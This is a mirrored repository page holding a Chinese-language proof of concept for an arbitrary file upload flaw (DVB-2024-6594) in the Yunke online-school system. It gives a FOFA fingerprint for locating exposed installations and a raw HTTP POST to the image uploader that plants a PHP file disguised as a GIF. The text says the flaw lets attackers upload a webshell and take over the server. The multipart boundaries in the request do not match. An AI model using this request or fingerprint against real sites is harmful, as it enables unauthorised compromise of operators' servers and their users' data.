admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/云课网校系统/云课网校系统文件上传漏洞(DVB-2024-6594).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.1 KiB
Raw Blame History

云课网校系统文件上传漏洞(DVB-2024-6594)

云课网校系统是一款基于ThinkPhP框架的网校系统包含直播点播考试问答论坛文章等模块是一款最具性价比的线上学习系统。该系统存在任意文件上传漏洞攻击者可以直接上传webshell文件获取服务器权限

fofa

"/static/libs/common/jquery.stickyNavbar.min.js"

poc

POST /api/uploader/uploadImage HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="1G3311040N.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundaryLZbmKeasWgo2gPtU--

image.png